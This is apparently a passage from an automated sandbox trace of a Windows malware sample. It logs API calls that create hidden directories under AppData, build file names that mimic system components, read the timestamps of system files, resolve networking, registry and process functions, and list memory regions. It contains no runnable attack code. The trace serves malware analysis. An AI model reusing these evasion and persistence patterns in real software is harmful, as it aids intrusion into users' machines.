[0032.171] GetLastError () returned 0x0 [0032.171] SetLastError (dwErrCode=0x0) [0032.171] GetLastError () returned 0x0 [0032.171] SetLastError (dwErrCode=0x0) [0032.171] GetLastError () returned 0x0 [0032.171] SetLastError (dwErrCode=0x0) [0032.171] GetLastError () returned 0x0 [0032.171] SetLastError (dwErrCode=0x0) [0032.171] GetLastError () returned 0x0 [0032.171] SetLastError (dwErrCode=0x0) [0032.171] GetLastError () returned 0x0 [0032.171] SetLastError (dwErrCode=0x0) [0032.171] GetLastError () returned 0x0 [0032.171] SetLastError (dwErrCode=0x0) [0032.171] GetLastError () returned 0x0 [0032.171] SetLastError (dwErrCode=0x0) [0032.171] GetLastError () returned 0x0 [0032.171] SetLastError (dwErrCode=0x0) [0032.171] GetLastError () returned 0x0 [0032.171] SetLastError (dwErrCode=0x0) [0032.171] GetLastError () returned 0x0 [0032.172] SetLastError (dwErrCode=0x0) [0032.172] GetLastError () returned 0x0 [0032.172] SetLastError (dwErrCode=0x0) [0032.172] GetLastError () returned 0x0 [0032.172] SetLastError (dwErrCode=0x0) [0032.172] GetLastError () returned 0x0 [0032.172] SetLastError (dwErrCode=0x0) [0032.172] GetLastError () returned 0x0 [0032.172] SetLastError (dwErrCode=0x0) [0032.172] GetLastError () returned 0x0 [0032.172] SetLastError (dwErrCode=0x0) [0032.172] GetLastError () returned 0x0 [0032.172] SetLastError (dwErrCode=0x0) [0032.172] GetLastError () returned 0x0 [0032.172] SetLastError (dwErrCode=0x0) [0032.172] GetLastError () returned 0x0 [0032.172] SetLastError (dwErrCode=0x0) [0032.172] GetLastError () returned 0x0 [0032.172] SetLastError (dwErrCode=0x0) [0032.172] GetLastError () returned 0x0 [0032.172] SetLastError (dwErrCode=0x0) [0032.172] GetLastError () returned 0x0 [0032.172] SetLastError (dwErrCode=0x0) [0032.172] GetLastError () returned 0x0 [0032.172] SetLastError (dwErrCode=0x0) [0032.172] GetLastError () returned 0x0 [0032.172] SetLastError (dwErrCode=0x0) [0032.172] GetLastError () returned 0x0 [0032.172] SetLastError (dwErrCode=0x0) [0032.172] GetLastError () returned 0x0 [0032.175] SetLastError (dwErrCode=0x0) [0032.175] GetLastError () returned 0x0 [0032.175] SetLastError (dwErrCode=0x0) [0032.175] GetLastError () returned 0x0 [0032.175] SetLastError (dwErrCode=0x0) [0032.175] GetLastError () returned 0x0 [0032.175] SetLastError (dwErrCode=0x0) [0032.175] GetLastError () returned 0x0 [0032.175] SetLastError (dwErrCode=0x0) [0032.175] GetLastError () returned 0x0 [0032.175] SetLastError (dwErrCode=0x0) [0032.175] GetLastError () returned 0x0 [0032.175] SetLastError (dwErrCode=0x0) [0032.175] GetLastError () returned 0x0 [0032.175] SetLastError (dwErrCode=0x0) [0032.175] GetLastError () returned 0x0 [0032.175] SetLastError (dwErrCode=0x0) [0032.175] GetLastError () returned 0x0 [0032.175] SetLastError (dwErrCode=0x0) [0032.175] GetLastError () returned 0x0 [0032.175] SetLastError (dwErrCode=0x0) [0032.175] GetLastError () returned 0x0 [0032.175] SetLastError (dwErrCode=0x0) [0032.175] GetLastError () returned 0x0 [0032.176] SetLastError (dwErrCode=0x0) [0032.176] GetLastError () returned 0x0 [0032.176] SetLastError (dwErrCode=0x0) [0032.176] GetLastError () returned 0x0 [0032.176] SetLastError (dwErrCode=0x0) [0032.176] GetLastError () returned 0x0 [0032.176] SetLastError (dwErrCode=0x0) [0032.176] GetLastError () returned 0x0 [0032.176] SetLastError (dwErrCode=0x0) [0032.176] GetLastError () returned 0x0 [0032.176] SetLastError (dwErrCode=0x0) [0032.176] GetLastError () returned 0x0 [0032.176] SetLastError (dwErrCode=0x0) [0032.176] GetLastError () returned 0x0 [0032.176] SetLastError (dwErrCode=0x0) [0032.176] GetLastError () returned 0x0 [0032.176] SetLastError (dwErrCode=0x0) [0032.176] GetLastError () returned 0x0 [0032.176] SetLastError (dwErrCode=0x0) [0032.176] GetLastError () returned 0x0 [0032.176] SetLastError (dwErrCode=0x0) [0032.176] GetLastError () returned 0x0 [0032.176] SetLastError (dwErrCode=0x0) [0032.176] GetLastError () returned 0x0 [0032.176] SetLastError (dwErrCode=0x0) [0032.176] GetLastError () returned 0x0 [0032.176] SetLastError (dwErrCode=0x0) [0032.176] GetLastError () returned 0x0 [0032.176] SetLastError (dwErrCode=0x0) [0032.176] GetLastError () returned 0x0 [0032.176] SetLastError (dwErrCode=0x0) [0032.176] GetLastError () returned 0x0 [0032.177] SetLastError (dwErrCode=0x0) [0032.177] GetLastError () returned 0x0 [0032.177] SetLastError (dwErrCode=0x0) [0032.177] GetLastError () returned 0x0 [0032.177] SetLastError (dwErrCode=0x0) [0032.177] GetLastError () returned 0x0 [0032.177] SetLastError (dwErrCode=0x0) [0032.177] GetLastError () returned 0x0 [0032.177] SetLastError (dwErrCode=0x0) [0032.177] GetLastError () returned 0x0 [0032.177] SetLastError (dwErrCode=0x0) [0032.177] GetLastError () returned 0x0 [0032.177] SetLastError (dwErrCode=0x0) [0032.177] GetLastError () returned 0x0 [0032.177] SetLastError (dwErrCode=0x0) [0032.177] GetLastError () returned 0x0 [0032.177] SetLastError (dwErrCode=0x0) [0032.177] GetLastError () returned 0x0 [0032.177] SetLastError (dwErrCode=0x0) [0032.177] GetLastError () returned 0x0 [0032.177] SetLastError (dwErrCode=0x0) [0032.177] GetLastError () returned 0x0 [0032.177] SetLastError (dwErrCode=0x0) [0032.177] GetLastError () returned 0x0 [0032.177] SetLastError (dwErrCode=0x0) [0032.177] GetLastError () returned 0x0 [0032.177] SetLastError (dwErrCode=0x0) [0032.177] GetLastError () returned 0x0 [0032.177] SetLastError (dwErrCode=0x0) [0032.177] GetLastError () returned 0x0 [0032.177] SetLastError (dwErrCode=0x0) [0032.177] GetLastError () returned 0x0 [0032.178] SetLastError (dwErrCode=0x0) [0032.178] GetLastError () returned 0x0 [0032.178] SetLastError (dwErrCode=0x0) [0032.178] GetLastError () returned 0x0 [0032.178] SetLastError (dwErrCode=0x0) [0032.178] GetLastError () returned 0x0 [0032.178] SetLastError (dwErrCode=0x0) [0032.178] GetLastError () returned 0x0 [0032.178] SetLastError (dwErrCode=0x0) [0032.178] GetLastError () returned 0x0 [0032.178] SetLastError (dwErrCode=0x0) [0032.178] GetLastError () returned 0x0 [0032.178] SetLastError (dwErrCode=0x0) [0032.178] GetLastError () returned 0x0 [0032.178] SetLastError (dwErrCode=0x0) [0032.178] GetLastError () returned 0x0 [0032.178] SetLastError (dwErrCode=0x0) [0032.178] GetLastError () returned 0x0 [0032.178] SetLastError (dwErrCode=0x0) [0032.178] GetLastError () returned 0x0 [0032.178] SetLastError (dwErrCode=0x0) [0032.178] GetLastError () returned 0x0 [0032.178] SetLastError (dwErrCode=0x0) [0032.178] GetLastError () returned 0x0 [0032.178] SetLastError (dwErrCode=0x0) [0032.178] GetLastError () returned 0x0 [0032.178] SetLastError (dwErrCode=0x0) [0032.178] GetLastError () returned 0x0 [0032.178] SetLastError (dwErrCode=0x0) [0032.178] GetLastError () returned 0x0 [0032.178] SetLastError (dwErrCode=0x0) [0032.178] GetLastError () returned 0x0 [0032.179] SetLastError (dwErrCode=0x0) [0032.179] GetLastError () returned 0x0 [0032.179] SetLastError (dwErrCode=0x0) [0032.179] GetLastError () returned 0x0 [0032.179] SetLastError (dwErrCode=0x0) [0032.179] GetLastError () returned 0x0 [0032.179] SetLastError (dwErrCode=0x0) [0032.179] GetLastError () returned 0x0 [0032.179] SetLastError (dwErrCode=0x0) [0032.179] GetLastError () returned 0x0 [0032.179] SetLastError (dwErrCode=0x0) [0032.179] GetLastError () returned 0x0 [0032.179] SetLastError (dwErrCode=0x0) [0032.179] GetLastError () returned 0x0 [0032.179] SetLastError (dwErrCode=0x0) [0032.179] GetLastError () returned 0x0 [0032.179] SetLastError (dwErrCode=0x0) [0032.179] GetLastError () returned 0x0 [0032.179] SetLastError (dwErrCode=0x0) [0032.179] GetLastError () returned 0x0 [0032.179] SetLastError (dwErrCode=0x0) [0032.179] GetLastError () returned 0x0 [0032.179] SetLastError (dwErrCode=0x0) [0032.179] GetLastError () returned 0x0 [0032.179] SetLastError (dwErrCode=0x0) [0032.179] GetLastError () returned 0x0 [0032.179] SetLastError (dwErrCode=0x0) [0032.179] GetLastError () returned 0x0 [0032.179] SetLastError (dwErrCode=0x0) [0032.179] GetLastError () returned 0x0 [0032.179] SetLastError (dwErrCode=0x0) [0032.179] GetLastError () returned 0x0 [0032.180] SetLastError (dwErrCode=0x0) [0032.180] GetLastError () returned 0x0 [0032.180] SetLastError (dwErrCode=0x0) [0032.180] GetLastError () returned 0x0 [0032.180] SetLastError (dwErrCode=0x0) [0032.180] GetLastError () returned 0x0 [0032.180] SetLastError (dwErrCode=0x0) [0032.180] GetLastError () returned 0x0 [0032.180] SetLastError (dwErrCode=0x0) [0032.180] GetLastError () returned 0x0 [0032.180] SetLastError (dwErrCode=0x0) [0032.180] GetLastError () returned 0x0 [0032.180] SetLastError (dwErrCode=0x0) [0032.180] GetLastError () returned 0x0 [0032.180] SetLastError (dwErrCode=0x0) [0032.180] GetLastError () returned 0x0 [0032.180] SetLastError (dwErrCode=0x0) [0032.180] GetLastError () returned 0x0 [0032.180] SetLastError (dwErrCode=0x0) [0032.180] GetLastError () returned 0x0 [0032.180] SetLastError (dwErrCode=0x0) [0032.180] GetLastError () returned 0x0 [0032.180] SetLastError (dwErrCode=0x0) [0032.180] GetLastError () returned 0x0 [0032.180] SetLastError (dwErrCode=0x0) [0032.180] GetLastError () returned 0x0 [0032.180] SetLastError (dwErrCode=0x0) [0032.180] GetLastError () returned 0x0 [0032.180] SetLastError (dwErrCode=0x0) [0032.180] GetLastError () returned 0x0 [0032.180] SetLastError (dwErrCode=0x0) [0032.180] GetLastError () returned 0x0 [0032.181] SetLastError (dwErrCode=0x0) [0032.181] GetLastError () returned 0x0 [0032.181] SetLastError (dwErrCode=0x0) [0032.181] GetLastError () returned 0x0 [0032.181] SetLastError (dwErrCode=0x0) [0032.181] GetLastError () returned 0x0 [0032.181] SetLastError (dwErrCode=0x0) [0032.181] GetLastError () returned 0x0 [0032.181] SetLastError (dwErrCode=0x0) [0032.181] GetLastError () returned 0x0 [0032.181] SetLastError (dwErrCode=0x0) [0032.181] GetLastError () returned 0x0 [0032.181] SetLastError (dwErrCode=0x0) [0032.181] GetLastError () returned 0x0 [0032.181] SetLastError (dwErrCode=0x0) [0032.182] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0032.182] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0032.188] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0032.189] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f7a0 | out: lpSystemTimeAsFileTime=0x22f7a0*(dwLowDateTime=0xe0e8c290, dwHighDateTime=0x1d3dfba)) [0032.190] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22f6d8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.190] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22f5c0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.190] GetLastError () returned 0x0 [0032.190] GetLastError () returned 0x0 [0032.190] GetLastError () returned 0x0 [0032.190] GetLastError () returned 0x0 [0032.190] GetLastError () returned 0x0 [0032.190] GetLastError () returned 0x0 [0032.190] GetLastError () returned 0x0 [0032.190] GetLastError () returned 0x0 [0032.190] GetLastError () returned 0x0 [0032.190] GetLastError () returned 0x0 [0032.190] GetLastError () returned 0x0 [0032.190] GetLastError () returned 0x0 [0032.190] GetLastError () returned 0x0 [0032.190] GetLastError () returned 0x0 [0032.190] GetLastError () returned 0x0 [0032.190] GetLastError () returned 0x0 [0032.190] GetLastError () returned 0x0 [0032.190] GetLastError () returned 0x0 [0032.190] GetLastError () returned 0x0 [0032.190] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.190] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0032.190] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.190] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.190] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.190] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.191] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0032.191] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0032.191] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0032.191] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0032.191] GetLastError () returned 0xb7 [0032.191] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.191] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0032.191] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0032.191] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0032.191] wsprintfA (in: param_1=0x22f440, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.191] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0032.191] wsprintfA (in: param_1=0x22f33c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.191] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.191] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0032.191] CloseHandle (hObject=0x74) returned 1 [0032.191] GetLastError () returned 0x0 [0032.191] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0032.191] GetLastError () returned 0x0 [0032.191] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0032.192] GetSystemDirectoryA (in: lpBuffer=0x22f440, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.192] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.192] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0032.192] CloseHandle (hObject=0x74) returned 1 [0032.192] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.192] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.192] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0032.193] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.193] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0032.193] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0032.194] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0032.194] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0032.194] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0032.194] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0032.194] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0032.194] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0032.194] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0032.194] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0032.194] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0032.194] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0032.194] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0032.194] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0032.194] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0032.194] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0032.194] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0032.194] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0032.194] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0032.195] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0032.195] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0032.195] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0032.195] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0032.195] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0032.195] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0032.195] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0032.195] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0032.195] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0032.195] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0032.195] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0032.195] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0032.195] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0032.195] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0032.195] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0032.195] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0032.195] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0032.195] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.195] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0032.195] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0032.196] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0032.196] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0032.196] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0032.196] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0032.196] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0032.196] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0032.196] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0032.196] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0032.196] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0032.196] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0032.196] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0032.196] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0032.196] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0032.196] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0032.196] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0032.196] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0032.196] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0032.196] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0032.196] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0032.197] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0032.197] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0032.197] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.197] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.197] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.197] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0032.197] AddAtomS () returned 0x0 [0032.198] HeapDestroy (hHeap=0x13c0000) returned 1 Process: id = "19" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f8c0" os_pid = "0xb34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomT /fn_args=\"1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 940 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 941 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 942 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 943 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 944 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 945 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 946 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 947 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 948 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 949 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 950 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 951 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 952 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 953 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 954 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 955 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 956 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 957 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 958 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 959 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 960 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 961 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 962 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = 